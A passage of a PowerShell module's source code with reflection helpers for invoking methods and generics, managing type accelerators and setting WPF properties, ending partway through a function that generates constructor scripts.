"^get_|^set_" } | Where-Object { $( foreach($n in $Name) { $_.Name -like $n } ) -contains $True } ) { $method | Add-Member NoteProperty TypeName -Value $($method.ReflectedType.FullName ) -Passthru | Add-Member NoteProperty Definition -Value $(Get-MemberSignature $method -Simple) -Passthru | Add-Member AliasProperty Syntax Definition -Passthru | #Add-Member NoteProperty Syntax -Value $(Get-MemberSignature $method -Simple) -Passthru | Add-Member NoteProperty SafeSyntax -Value $(Get-MemberSignature $method ) -Passthru } } } function Get-MemberSignature { [CmdletBinding()] param( [Parameter(ValueFromPipeline=$true,Mandatory=$true)] [System.Reflection.MethodBase]$MethodBase, [Switch]$Simple ) process { $parameters = $( foreach($param in $MethodBase.GetParameters()) { # Write-Host $param.ParameterType.FullName.TrimEnd('&'), $param.Name -fore cyan Write-Verbose "$($param.ParameterType.UnderlyingSystemType.FullName) - $($param.ParameterType)" if($param.ParameterType.Name.EndsWith('&')) { $ref = '[ref]' } else { $ref = '' } if($param.ParameterType.IsArray) { $array = ',' } else { $array = '' } if($Simple) { '{0} {1}' -f $param.ParameterType.ToString(), $param.Name } else { '{0}({1}[{2}]${3})' -f $ref, $array, $param.ParameterType.ToString().TrimEnd('&'), $param.Name } } ) if($MethodBase.IsConstructor) { "New-Object $($MethodBase.ReflectedType.FullName) $($parameters -join ', ')" } elseif($Simple) { "$($MethodBase.ReturnType.FullName) $($MethodBase.Name)($($parameters -join ', '))" } elseif($MethodBase.IsStatic) { "[$($MethodBase.ReturnType.FullName)] [$($MethodBase.ReflectedType.FullName)]::$($MethodBase.Name)($($parameters -join ', '))" } else { "[$($MethodBase.ReturnType.FullName)] `$$($MethodBase.ReflectedType.Name)Object.$($MethodBase.Name)($($parameters -join ', '))" } } } function Read-Choice { [CmdletBinding()] param( [Parameter(Mandatory=$true, ValueFromRemainingArguments=$true)] [hashtable[]]$Choices , [Parameter(Mandatory=$False)] [string]$Caption = "Please choose!" , [Parameter(Mandatory=$False)] [string]$Message = "Choose one of the following options:" , [Parameter(Mandatory=$False)] [int[]]$Default = 0 , [Switch]$MultipleChoice , [Switch]$Passthru ) begin { [System.Collections.DictionaryEntry[]]$choices = $choices | % { $_.GetEnumerator() } } process { $Descriptions = [System.Management.Automation.Host.ChoiceDescription[]]( $( foreach($choice in $choices) { New-Object System.Management.Automation.Host.ChoiceDescription $choice.Key,$choice.Value } ) ) if(!$MultipleChoice) { [int]$Default = $Default[0] } [int[]]$Answer = $Host.UI.PromptForChoice($Caption,$Message,$Descriptions,$Default) if($Passthru) { Write-Verbose "$Answer" Write-Output $Descriptions[$Answer] } else { Write-Output $Answer } } } function Get-Argument { param( [Type]$Target , [ref]$Method , [Array]$Arguments ) end { trap { write-error $_ break } $flags = [System.Reflection.BindingFlags]"public,ignorecase,invokemethod,instance" [Type[]]$Types = @( foreach($arg in $Arguments) { if($arg -is [type]) { $arg } else { $arg.GetType() } } ) try { Write-Verbose "[$($Target.FullName)].GetMethod('$($Method.Value)', [$($Flags.GetType())]'$flags', `$null, ([Type[]]($(@($Types|%{$_.Name}) -join ','))), `$null)" $MethodBase = $Target.GetMethod($($Method.Value), $flags, $null, $types, $null) $Arguments if($MethodBase) { $Method.Value = $MethodBase.Name } } catch { } if(!$MethodBase) { Write-Verbose "Try again to get $($Method.Value) Method on $($Target.FullName):" $MethodBase = Get-Method $target $($Method.Value) if(@($MethodBase).Count -gt 1) { $i = 0 $i = Read-Choice -Choices $(foreach($mb in $MethodBase) { @{ "$($mb.SafeSyntax) &$($i = $i+1;$i)`b`n" = $mb.SafeSyntax } }) -Default ($MethodBase.Count-1) -Caption "Choose a Method." -Message "Please choose which method overload to invoke:" [System.Reflection.MethodBase]$MethodBase = $MethodBase[$i] } ForEach($parameter in $MethodBase.GetParameters()) { $found = $false For($a =0;$a -lt $Arguments.Count;$a++) { if($argument[$a] -as $parameter.ParameterType) { Write-Output $argument[$a] if($a -gt 0 -and $a -lt $Arguments.Count) { $Arguments = $Arguments | Select -First ($a-1) -Last ($Arguments.Count -$a) } elseif($a -eq 0) { $Arguments = $Arguments | Select -Last ($Arguments.Count - 1) } else { # a -eq count $Arguments = $Arguments | Select -First ($Arguments.Count - 1) } $found = $true break } } if(!$Found) { $userInput = Read-Host "Please enter a [$($parameter.ParameterType.FullName)] value for $($parameter.Name)" if($userInput -match '^{.*}$' -and !($userInput -as $parameter.ParameterType)) { Write-Output ((Invoke-Expression $userInput) -as $parameter.ParameterType) } else { Write-Output ($userInput -as $parameter.ParameterType) } } } } } } function Invoke-Member { [CmdletBinding()] param( [parameter(position=10, valuefrompipeline=$true, mandatory=$true)] [allowemptystring()] $InputObject , [parameter(position=0, mandatory=$true)] [validatenotnullorempty()] $Member , [parameter(position=1, valuefromremainingarguments=$true)] [allowemptycollection()] $Arguments , [parameter()] [switch]$Static ) # begin { # if(!(get-member SafeSyntax -input $Member -type Property)){ # if(get-member Name -inpup $Member -Type Property) { # $Member = Get-Method $InputObject $Member.Name # } else { # $Member = Get-Method $InputObject $Member # } # } # $SafeSyntax = [ScriptBlock]::Create( $Member.SafeSyntax ) # } process { # if ($InputObject) # { # if ($InputObject | Get-Member $Member -static:$static) # { if ($InputObject -is [type]) { $target = $InputObject } else { $target = $InputObject.GetType() } if(Get-Member $Member -InputObject $InputObject -Type Properties) { $_.$Member } elseif($Member -match "ctor|constructor") { $Member = ".ctor" [System.Reflection.BindingFlags]$flags = "CreateInstance" $InputObject = $Null } else { [System.Reflection.BindingFlags]$flags = "IgnoreCase,Public,InvokeMethod" if($Static) { $flags = "$Flags,Static" } else { $flags = "$Flags,Instance" } } [ref]$Member = $Member [Object[]]$Parameters = Get-Argument $Target $Member $Arguments [string]$Member = $Member.Value Write-Verbose $(($Parameters | %{ '[' + $_.GetType().FullName + ']' + $_ }) -Join ", ") try { Write-Verbose "Invoking $Member on [$target]$InputObject with [$($Flags.GetType())]'$flags' and [$($Parameters.GetType())]($($Parameters -join ','))" Write-Verbose "[$($target.FullName)].InvokeMember('$Member', [System.Reflection.BindingFlags]'$flags', `$null, '$InputObject', ([object[]]($(($Parameters | %{ '[' + $_.GetType().FullName + ']''' + $_ + ''''}) -join', '))))" $target.InvokeMember($Member, [System.Reflection.BindingFlags]"$flags", $null, $InputObject, $Parameters) } catch { Write-Warning $_.Exception if ($_.Exception.Innerexception -is [MissingMethodException]) { write-warning "Method argument count (or type) mismatch." } } # } else { # write-warning "Method $Member not found." # } # } } } function Invoke-Generic { #.Synopsis # Invoke Generic method definitions via reflection: [CmdletBinding()] param( [Parameter(Position=0,Mandatory=$true,ValueFromPipelineByPropertyName=$true)] [Alias('On')] $InputObject , [Parameter(Position=1,ValueFromPipelineByPropertyName=$true)] [Alias('Named')] [string]$MethodName , [Parameter(Position=2)] [Alias("Types")] [Type[]]$ParameterTypes , [Parameter(Position=4, ValueFromRemainingArguments=$true, ValueFromPipelineByPropertyName=$true)] [Object[]]$WithArgs , [Switch]$Static ) begin { if($Static) { $BindingFlags = [System.Reflection.BindingFlags]"IgnoreCase,Public,Static" } else { $BindingFlags = [System.Reflection.BindingFlags]"IgnoreCase,Public,Instance" } } process { $Type = $InputObject -as [Type] if(!$Type) { $Type = $InputObject.GetType() } if($WithArgs -and -not $ParameterTypes) { $ParameterTypes = $withArgs | % { $_.GetType() } } elseif(!$ParameterTypes) { $ParameterTypes = [Type]::EmptyTypes } trap { continue } $MemberInfo = $Type.GetMethod($MethodName, $BindingFlags) if(!$MemberInfo) { $MemberInfo = $Type.GetMethod($MethodName, $BindingFlags, $null, $NonGenericArgumentTypes, $null) } if(!$MemberInfo) { $MemberInfo = $Type.GetMethods($BindingFlags) | Where-Object { $MI = $_ [bool]$Accept = $MI.Name -eq $MethodName if($Accept){ Write-Verbose "$Accept = $($MI.Name) -eq $($MethodName)" [Array]$GenericTypes = @($MI.GetGenericArguments() | Select -Expand Name) [Array]$Parameters = @($MI.GetParameters() | Add-Member ScriptProperty -Name IsGeneric -Value { $GenericTypes -Contains $this.ParameterType } -Passthru) $Accept = $ParameterTypes.Count -eq $Parameters.Count Write-Verbose " $Accept = $($Parameters.Count) Arguments" if($Accept) { for($i=0;$i -lt $Parameters.Count;$i++) { $Accept = $Accept -and ( $Parameters[$i].IsGeneric -or ($ParameterTypes[$i] -eq $Parameters[$i].ParameterType)) Write-Verbose " $Accept =$(if($Parameters[$i].IsGeneric){' GENERIC or'}) $($ParameterTypes[$i]) -eq $($Parameters[$i].ParameterType)" } } } return $Accept } | Sort { @($_.GetGenericArguments()).Count } | Select -First 1 } Write-Verbose "Time to make generic methods." Write-Verbose $MemberInfo [Type[]]$GenericParameters = @() [Array]$ConcreteTypes = @($MemberInfo.GetParameters() | Select -Expand ParameterType) for($i=0;$i -lt $ParameterTypes.Count;$i++){ Write-Verbose "$($ParameterTypes[$i]) ? $($ConcreteTypes[$i] -eq $ParameterTypes[$i])" if($ConcreteTypes[$i] -ne $ParameterTypes[$i]) { $GenericParameters += $ParameterTypes[$i] } $ParameterTypes[$i] = Add-Member -in $ParameterTypes[$i] -Type NoteProperty -Name IsGeneric -Value $($ConcreteTypes[$i] -ne $ParameterTypes[$i]) -Passthru } $ParameterTypes | Where-Object { $_.IsGeneric } Write-Verbose "$($GenericParameters -join ', ') generic parameters" $MemberInfo = $MemberInfo.MakeGenericMethod( $GenericParameters ) Write-Verbose $MemberInfo if($WithArgs) { [Object[]]$Arguments = $withArgs | %{ $_.PSObject.BaseObject } Write-Verbose "Arguments: $(($Arguments | %{ $_.GetType().Name }) -Join ', ')" $MemberInfo.Invoke( $InputObject, $Arguments ) } else { $MemberInfo.Invoke( $InputObject ) } } } # get a reference to the Type $xlr8r = [psobject].assembly.gettype("System.Management.Automation.TypeAccelerators") function Import-Namespace { [CmdletBinding()] param( [Parameter(ValueFromPipeline=$true)] [string]$Namespace , [Switch]$Force ) Get-Type -Namespace $Namespace -Force:$Force | Add-Accelerator } function Add-Accelerator { <# .Synopsis Add a type accelerator to the current session .Description The Add-Accelerator function allows you to add a simple type accelerator (like [regex]) for a longer type (like [System.Text.RegularExpressions.Regex]). .Example Add-Accelerator list System.Collections.Generic.List``1 $list = New-Object list[string] Creates an accelerator for the generic List[T] collection type, and then creates a list of strings. .Example Add-Accelerator "List T", "GList" System.Collections.Generic.List``1 $list = New-Object "list t[string]" Creates two accelerators for the Generic List[T] collection type. .Parameter Accelerator The short form accelerator should be just the name you want to use (without square brackets). .Parameter Type The type you want the accelerator to accelerate (without square brackets) .Notes When specifying multiple values for a parameter, use commas to separate the values. For example, "-Accelerator string, regex". PowerShell requires arguments that are "types" to NOT have the square bracket type notation, because of the way the parsing engine works. You can either just type in the type as System.Int64, or you can put parentheses around it to help the parser out: ([System.Int64]) Also see the help for Get-Accelerator and Remove-Accelerator .Link http://huddledmasses.org/powershell-2-ctp3-custom-accelerators-finally/ #> [CmdletBinding()] param( [Parameter(Position=0,ValueFromPipelineByPropertyName=$true)] [Alias("Key","Name")] [string[]]$Accelerator , [Parameter(Position=1,ValueFromPipeline=$true,ValueFromPipelineByPropertyName=$true)] [Alias("Value","FullName")] [type]$Type ) process { # add a user-defined accelerator foreach($a in $Accelerator) { $xlr8r::AddReplace( $a, $Type) trap [System.Management.Automation.MethodInvocationException] { if($xlr8r::get.keys -contains $a) { if($xlr8r::get[$a] -ne $Type) { Write-Error "Cannot add accelerator [$a] for [$($Type.FullName)]`n [$a] is already defined as [$($xlr8r::get[$a].FullName)]" } Continue; } throw } } } } function Get-Accelerator { <# .Synopsis Get one or more type accelerator definitions .Description The Get-Accelerator function allows you to look up the type accelerators (like [regex]) defined on your system by their short form or by type .Example Get-Accelerator System.String Returns the KeyValue pair for the [System.String] accelerator(s) .Example Get-Accelerator ps*,wmi* Returns the KeyValue pairs for the matching accelerator definition(s) .Parameter Accelerator One or more short form accelerators to search for (Accept wildcard characters). .Parameter Type One or more types to search for. .Notes When specifying multiple values for a parameter, use commas to separate the values. For example, "-Accelerator string, regex". Also see the help for Add-Accelerator and Remove-Accelerator .Link http://huddledmasses.org/powershell-2-ctp3-custom-accelerators-finally/ #> [CmdletBinding(DefaultParameterSetName="ByType")] param( [Parameter(Position=0, ParameterSetName="ByAccelerator", ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias("Key","Name")] [string[]]$Accelerator , [Parameter(Position=0, ParameterSetName="ByType", ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias("Value","FullName")] [type[]]$Type ) process { # add a user-defined accelerator switch($PSCmdlet.ParameterSetName) { "ByAccelerator" { $xlr8r::get.GetEnumerator() | % { foreach($a in $Accelerator) { if($_.Key -like $a) { $_ } } } break } "ByType" { if($Type -and $Type.Count) { $xlr8r::get.GetEnumerator() | ? { $Type -contains $_.Value } } else { $xlr8r::get.GetEnumerator() | %{ $_ } } break } } } } function Remove-Accelerator { <# .Synopsis Remove a type accelerator from the current session .Description The Remove-Accelerator function allows you to remove a simple type accelerator (like [regex]) from the current session. You can pass one or more accelerators, and even wildcards, but you should be aware that you can remove even the built-in accelerators. .Example Remove-Accelerator int Add-Accelerator int Int64 Removes the "int" accelerator for Int32 and adds a new one for Int64. I can't recommend doing this, but it's pretty cool that it works: So now, "$(([int]3.4).GetType().FullName)" would return "System.Int64" .Example Get-Accelerator System.Single | Remove-Accelerator Removes both of the default accelerators for System.Single: [float] and [single] .Example Get-Accelerator System.Single | Remove-Accelerator -WhatIf Demonstrates that Remove-Accelerator supports -Confirm and -Whatif. Will Print: What if: Removes the alias [float] for type [System.Single] What if: Removes the alias [single] for type [System.Single] .Parameter Accelerator The short form accelerator that you want to remove (Accept wildcard characters). .Notes When specifying multiple values for a parameter, use commas to separate the values. For example, "-Accel string, regex". Also see the help for Add-Accelerator and Get-Accelerator .Link http://huddledmasses.org/powershell-2-ctp3-custom-accelerators-finally/ #> [CmdletBinding(SupportsShouldProcess=$true)] param( [Parameter(Position=0, ValueFromPipeline=$true, ValueFromPipelineByPropertyName=$true)] [Alias("Key","FullName")] [string[]]$Accelerator ) process { foreach($a in $Accelerator) { foreach($key in $xlr8r::Get.Keys -like $a) { if($PSCmdlet.ShouldProcess( "Removes the alias [$($Key)] for type [$($xlr8r::Get[$key].FullName)]", "Remove the alias [$($Key)] for type [$($xlr8r::Get[$key].FullName)]?", "Removing Type Accelerator" )) { # remove a user-defined accelerator $xlr8r::remove($key) } } } } } ############################################################################### ##### Imported from PowerBoots $Script:CodeGenContentProperties = 'Content','Child','Children','Frames','Items','Pages','Blocks','Inlines','GradientStops','Source','DataPoints', 'Series', 'VisualTree' $DependencyProperties = @{} if(Test-Path $PSScriptRoot\\DependencyPropertyCache.xml) { #$DependencyProperties = [System.Windows.Markup.XamlReader]::Parse( (gc $PSScriptRoot\\DependencyPropertyCache.xml) ) $DependencyProperties = Import-CliXml $PSScriptRoot\\DependencyPropertyCache.xml } function Get-ReflectionModule { $executioncontext.sessionstate.module } function Set-ObjectProperties { [CmdletBinding()] param( $Parameters, [ref]$DObject ) if($DObject.Value -is [System.ComponentModel.ISupportInitialize]) { $DObject.Value.BeginInit() } if($DebugPreference -ne "SilentlyContinue") { Write-Host; Write-Host ">>>> $($Dobject.Value.GetType().FullName)" -fore Black -back White } foreach ($param in $Parameters) { if($DebugPreference -ne "SilentlyContinue") { Write-Host "Processing Param: $($param|Out-String )" } ## INGORE DEPENDENCY PROPERTIES FOR NOW :) if($param.Key -eq "DependencyProps") { ## HANDLE EVENTS .... } elseif ($param.Key.StartsWith("On_")) { $EventName = $param.Key.SubString(3) if($DebugPreference -ne "SilentlyContinue") { Write-Host "Event handler $($param.Key) Type: $(@($param.Value)[0].GetType().FullName)" } $sb = $param.Value -as [ScriptBlock] if(!$sb) { $sb = (Get-Command $param.Value -CommandType Function,ExternalScript).ScriptBlock } $Dobject.Value."Add_$EventName".Invoke( $sb ); # $Dobject.Value."Add_$EventName".Invoke( ($sb.GetNewClosure()) ); # $Dobject.Value."Add_$EventName".Invoke( $PSCmdlet.MyInvocation.MyCommand.Module.NewBoundScriptBlock( $sb.GetNewClosure() ) ); } ## HANDLE PROPERTIES .... else { try { ## TODO: File a BUG because Write-DEBUG and Write-VERBOSE die here. if($DebugPreference -ne "SilentlyContinue") { Write-Host "Setting $($param.Key) of $($Dobject.Value.GetType().Name) to $($param.Value.GetType().FullName): $($param.Value)" -fore Gray } if(@(foreach($sb in $param.Value) { $sb -is [ScriptBlock] }) -contains $true) { $Values = @() foreach($sb in $param.Value) { $Values += & (Get-ReflectionModule) $sb } } else { $Values = $param.Value } if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( $Dobject.Value )) -foreground green } if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( @($Values)[0] )) -foreground green } Set-Property $Dobject $Param.Key $Values if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( $Dobject.Value )) -foreground magenta } if($DebugPreference -ne "SilentlyContinue") { if( $Dobject.Value.$($param.Key) -ne $null ) { Write-Host $Dobject.Value.$($param.Key).GetType().FullName -fore Green } } } catch [Exception] { Write-Host "COUGHT AN EXCEPTION" -fore Red Write-Host $_ -fore Red Write-Host $this -fore DarkRed } } while($DependencyProps) { $name, $value, $DependencyProps = $DependencyProps $name = ([string]@($name)[0]).Trim("-") if($name -and $value) { Set-DependencyProperty -Element $Dobject.Value -Property $name -Value $Value } } } if($DebugPreference -ne "SilentlyContinue") { Write-Host "<<<< $($Dobject.Value.GetType().FullName)" -fore Black -back White; Write-Host } if($DObject.Value -is [System.ComponentModel.ISupportInitialize]) { $DObject.Value.EndInit() } } function Set-Property { PARAM([ref]$TheObject, $Name, $Values) $DObject = $TheObject.Value if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( $DObject )) -foreground DarkMagenta } if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( @($Values)[0] )) -foreground DarkMagenta } $PropertyType = $DObject.GetType().GetProperty($Name).PropertyType if('System.Windows.FrameworkElementFactory' -as [Type] -and $PropertyType -eq [System.Windows.FrameworkElementFactory] -and $DObject -is [System.Windows.FrameworkTemplate]) { if($DebugPreference -ne "SilentlyContinue") { Write-Host "Loading a FrameworkElementFactory" -foreground Green} # [Xml]$Template = [PoshWpf.XamlHelper]::ConvertToXaml( $DObject ) # [Xml]$Content = [PoshWpf.XamlHelper]::ConvertToXaml( (@($Values)[0]) ) # In .Net 3.5 the recommended way to programmatically create a template is to load XAML from a string or a memory stream using the Load method of the XamlReader class. [Xml]$Template = [System.Windows.Markup.XamlWriter]::Save( $DObject ) [Xml]$Content = [System.Windows.Markup.XamlWriter]::Save( (@($Values)[0]) ) $Template.DocumentElement.PrependChild( $Template.ImportNode($Content.DocumentElement, $true) ) | Out-Null $TheObject.Value = [System.Windows.Markup.XamlReader]::Parse( $Template.get_OuterXml() ) } elseif('System.Windows.Data.Binding' -as [Type] -and @($Values)[0] -is [System.Windows.Data.Binding] -and !$PropertyType.IsAssignableFrom([System.Windows.Data.BindingBase])) { $Binding = @($Values)[0]; if($DebugPreference -ne "SilentlyContinue") { Write-Host "$($DObject.GetType())::$Name is $PropertyType and the value is a Binding: $Binding" -fore Cyan} if(!$Binding.Source -and !$Binding.ElementName) { $Binding.Source = $DObject.DataContext } if($DependencyProperties.ContainsKey($Name)) { $field = @($DependencyProperties.$Name.Keys | Where { $DObject -is $_ -and $PropertyType -eq ([type]$DependencyProperties.$Name.$_.PropertyType)})[0] # -or -like "*$Class" -and ($Param1.Value -as ([type]$_.PropertyType) if($field) { if($DebugPreference -ne "SilentlyContinue") { Write-Host "$($field)" -fore Blue } if($DebugPreference -ne "SilentlyContinue") { Write-Host "Binding: ($field)::`"$($DependencyProperties.$Name.$field.Name)`" to $Binding" -fore Blue} $DObject.SetBinding( ([type]$field)::"$($DependencyProperties.$Name.$field.Name)", $Binding ) | Out-Null } else { throw "Couldn't figure out $( @($DependencyProperties.$Name.Keys) -join ', ' )" } } else { if($DebugPreference -ne "SilentlyContinue") { Write-Host "But $($DObject.GetType())::${Name}Property is not a Dependency Property, so it probably can't be bound?" -fore Cyan } try { $DObject.SetBinding( ($DObject.GetType()::"${Name}Property"), $Binding ) | Out-Null # $DObject.Add_Loaded( { # $this.SetBinding( ($this.GetType())::ItemsSourceProperty, (Binding -Source $this.DataContext) ) # } ) if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( $Dobject )) -foreground yellow } } catch { Write-Host "Nope, was not able to set it." -fore Red Write-Host $_ -fore Red Write-Host $this -fore DarkRed } } } elseif($PropertyType -ne [Object] -and $PropertyType.IsAssignableFrom( [System.Collections.IEnumerable] ) -and ($DObject.$($Name) -eq $null)) { if($Values -is [System.Collections.IEnumerable]) { if($DebugPreference -ne "SilentlyContinue") { Write-Host "$Name is $PropertyType which is IEnumerable, and the value is too!" -fore Cyan } $DObject.$($Name) = $Values } else { if($DebugPreference -ne "SilentlyContinue") { Write-Host "$Name is $PropertyType which is IEnumerable, but the value is not." -fore Cyan } $DObject.$($Name) = new-object "System.Collections.ObjectModel.ObservableCollection[$(@($Values)[0].GetType().FullName)]" $DObject.$($Name).Add($Values) } } elseif($DObject.$($Name) -is [System.Collections.IList]) { foreach ($value in @($Values)) { try { $null = $DObject.$($Name).Add($value) } catch { # Write-Host "CAUGHT array problem" -fore Red if($_.Exception.Message -match "Invalid cast from 'System.String' to 'System.Windows.UIElement'.") { $null = $DObject.$($Name).Add( (New-System.Windows.Controls.TextBlock $value) ) } else { Write-Error $_.Exception throw } } } } else { ## If they pass an array of 1 when we only want one, we just use the first value if($Values -is [System.Collections.IList] -and $Values.Count -eq 1) { if($DebugPreference -ne "SilentlyContinue") { Write-Host "Value is an IList ($($Values.GetType().FullName))" -fore Cyan} if($DebugPreference -ne "SilentlyContinue") { Write-Host "But we'll just use the first ($($Values[0].GetType().FullName))" -fore Cyan} if($DebugPreference -ne "SilentlyContinue") { Write-Host ([System.Windows.Markup.XamlWriter]::Save( $Values[0] )) -foreground White} try { $DObject.$($Name) = $Values[0] } catch [Exception] { # Write-Host "CAUGHT collection value problem" -fore Red if($_.Exception.Message -match "Invalid cast from 'System.String' to 'System.Windows.UIElement'.") { $null = $DObject.$($Name).Add( (TextBlock $Values[0]) ) }else { throw } } } else ## If they pass an array when we only want one, we try to use it, and failing that, cast it to strings { if($DebugPreference -ne "SilentlyContinue") { Write-Host "Value is just $Values" -fore Cyan} try { $DObject.$($Name) = $Values } catch [Exception] { # Write-Host "CAUGHT value problem" -fore Red if($_.Exception.Message -match "Invalid cast from 'System.String' to 'System.Windows.UIElement'.") { $null = $DObject.$($Name).Add( (TextBlock $values) ) }else { throw } } } } } function Set-DependencyProperty { [CmdletBinding()] PARAM( [Parameter(Position=0,Mandatory=$true)] $Property , [Parameter(Mandatory=$true,ValueFromPipeline=$true)] $Element , [Parameter()] [Switch]$Passthru ) DYNAMICPARAM { $paramDictionary = new-object System.Management.Automation.RuntimeDefinedParameterDictionary $Param1 = new-object System.Management.Automation.RuntimeDefinedParameter $Param1.Name = "Value" # $Param1.Attributes.Add( (New-ParameterAttribute -Position 1) ) $Param1.Attributes.Add( (New-Object System.Management.Automation.ParameterAttribute -Property @{ Position = 1 }) ) if( $Property ) { if($Property.GetType() -eq ([System.Windows.DependencyProperty]) -or $Property.GetType().IsSubclassOf(([System.Windows.DependencyProperty]))) { $Param1.ParameterType = $Property.PropertyType } elseif($Property -is [string] -and $Property.Contains(".")) { $Class,$Property = $Property.Split(".") if($DependencyProperties.ContainsKey($Property)){ $type = $DependencyProperties.$Property.Keys -like "*$Class" if($type) { $Param1.ParameterType = [type]@($DependencyProperties.$Property.$type)[0].PropertyType } } } elseif($DependencyProperties.ContainsKey($Property)){ if($Element) { if($DependencyProperties.$Property.ContainsKey( $element.GetType().FullName )) { $Param1.ParameterType = [type]$DependencyProperties.$Property.($element.GetType().FullName).PropertyType } } else { $Param1.ParameterType = [type]$DependencyProperties.$Property.Values[0].PropertyType } } else { $Param1.ParameterType = [PSObject] } } else { $Param1.ParameterType = [PSObject] } $paramDictionary.Add("Value", $Param1) return $paramDictionary } PROCESS { trap { Write-Host "ERROR Setting Dependency Property" -Fore Red Write-Host "Trying to set $Property to $($Param1.Value)" -Fore Red continue } if($Property.GetType() -eq ([System.Windows.DependencyProperty]) -or $Property.GetType().IsSubclassOf(([System.Windows.DependencyProperty])) ){ trap { Write-Host "ERROR Setting Dependency Property" -Fore Red Write-Host "Trying to set $($Property.FullName) to $($Param1.Value)" -Fore Red continue } $Element.SetValue($Property, ($Param1.Value -as $Property.PropertyType)) } else { if("$Property".Contains(".")) { $Class,$Property = "$Property".Split(".") } if( $DependencyProperties.ContainsKey("$Property" ) ) { $fields = @( $DependencyProperties.$Property.Keys -like "*$Class" | ? { $Param1.Value -as ([type]$DependencyProperties.$Property.$_.PropertyType) } ) if($fields.Count -eq 0 ) { $fields = @($DependencyProperties.$Property.Keys -like "*$Class" ) } if($fields.Count) { $success = $false foreach($field in $fields) { trap { Write-Host "ERROR Setting Dependency Property" -Fore Red Write-Host "Trying to set $($field)::$($DependencyProperties.$Property.$field.Name) to $($Param1.Value) -as $($DependencyProperties.$Property.$field.PropertyType)" -Fore Red continue } $Element.SetValue( ([type]$field)::"$($DependencyProperties.$Property.$field.Name)", ($Param1.Value -as ([type]$DependencyProperties.$Property.$field.PropertyType))) if($?) { $success = $true; break } } if(!$success) { throw "food" } } else { Write-Host "Couldn't find the right property: $Class.$Property on $( $Element.GetType().Name ) of type $( $Param1.Value.GetType().FullName )" -Fore Red } } else { Write-Host "Unknown Dependency Property Key: $Property on $($Element.GetType().Name)" -Fore Red } } if( $Passthru ) { $Element } } } Add-Type -Assembly WindowsBase function Add-ConstructorFunction { <# .Synopsis Add support for a new class by creating the dynamic constructor function(s). .Description Creates a New-Namespace.Type function for each type passed in, as well as a short form "Type" alias. Exposes all of the properties and events of the type as perameters to the function. NOTE: The Type MUST have a default parameterless constructor. .Parameter Assembly The Assembly you want to generate constructors for. All public types within it will be generated if possible. .Parameter Type The type you want to create a constructor function for. It must have a default parameterless constructor. .Example Add-ConstructorFunction System.Windows.Controls.Button Creates a new function for the Button control. .Example [Reflection.Assembly]::LoadWithPartialName( "PresentationFramework" ).GetTypes() | Add-ConstructorFunction Will create constructor functions for all the WPF components in the PresentationFramework assembly. Note that you could also load that assembly using GetAssembly( "System.Windows.Controls.Button" ) or Load( "PresentationFramework, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35" ) .Example Add-ConstructorFunction -Assembly PresentationFramework Will create constructor functions for all the WPF components in the PresentationFramework assembly. .Links http://HuddledMasses.org/powerboots .ReturnValue The name(s) of the function(s) created -- so you can export them, if necessary. .Notes AUTHOR: Joel Bennett http://HuddledMasses.org LASTEDIT: 2009-01-13 16:35:23 #> [CmdletBinding(DefaultParameterSetName="FromType")] PARAM( [Parameter(Position=0,ValueFromPipeline=$true,ParameterSetName="FromType",Mandatory=$true)] [type[]]$type , [Alias("FullName")] [Parameter(Position=0,ValueFromPipelineByPropertyName=$true,ParameterSetName="FromAssembly",Mandatory=$true)] [string[]]$Assembly , [Parameter()] [string]$Path = "$PSScriptRoot\\Types_Generated" , [switch]$Force , [switch]$ShortAliases , [Switch]$Quiet ) BEGIN { [Type[]]$Empty=@() if(!(Test-Path $Path)) { MkDir $Path } $ErrorList = @() } END { #Set-Content -Literal $PSScriptRoot\\DependencyPropertyCache.xml -Value ([System.Windows.Markup.XamlWriter]::Save( $DependencyProperties )) Export-CliXml -Path $PSScriptRoot\\DependencyPropertyCache.xml -InputObject $DependencyProperties if($ErrorList.Count) { Write-Warning "Some New-* functions not aliased." } $ErrorList | Write-Error } PROCESS { if($PSCmdlet.ParameterSetName -eq "FromAssembly") { [type[]]$type = @() foreach($lib in $Assembly) { $asm = $null trap { continue } if(Test-Path $lib) { $asm = [Reflection.Assembly]::LoadFrom( (Convert-Path (Resolve-Path $lib -EA "SilentlyContinue") -EA "SilentlyContinue") ) } if(!$asm) { ## BUGBUG: LoadWithPartialName is "Obsolete" -- but it still works in 2.0/3.5 $asm = [Reflection.Assembly]::LoadWithPartialName( $lib ) } if($asm) { $type += $asm.GetTypes() | ?{ $_.IsPublic -and !$_.IsEnum -and !$_.IsAbstract -and !$_.IsInterface -and $_.GetConstructor( "Instance,Public", $Null, $Empty, @() )} } else { Write-Error "Can't find the assembly $lib, please check your spelling and try again" } } } foreach($T in $type) { $TypeName = $T.FullName $ScriptPath = Join-Path $Path "New-$TypeName.ps1" Write-Verbose $TypeName ## Collect all dependency properties .... $T.GetFields() | Where-Object { $_.FieldType -eq [System.Windows.DependencyProperty] } | ForEach-Object { [string]$Field = $_.DeclaringType::"$($_.Name)".Name [string]$TypeName = $_.DeclaringType.FullName if(!$DependencyProperties.ContainsKey( $Field )) { $DependencyProperties.$Field = @{} } $DependencyProperties.$Field.$TypeName = @{ Name = [string]$_.Name PropertyType = [string]$_.DeclaringType::"$($_.Name)".PropertyType.FullName } } if(!( Test-Path $ScriptPath ) -OR $Force) { $Pipelineable = @(); ## Get (or generate) a set of parameters based on the the Type Name $PropertyNames = New-Object System.Text.StringBuilder "@(" $Parameters = New-Object System.Text.StringBuilder "[CmdletBinding(DefaultParameterSetName='Default')]`nPARAM(`n" ## Add all properties $Properties = $T.GetProperties("Public,Instance,FlattenHierarchy") | Where-Object { $_.CanWrite -Or $_.PropertyType.GetInterface([System.Collections.IList]) } $Properties = ($T.GetEvents("Public,Instance,FlattenHierarchy") + $Properties) | Sort-Object Name -Unique foreach ($p in 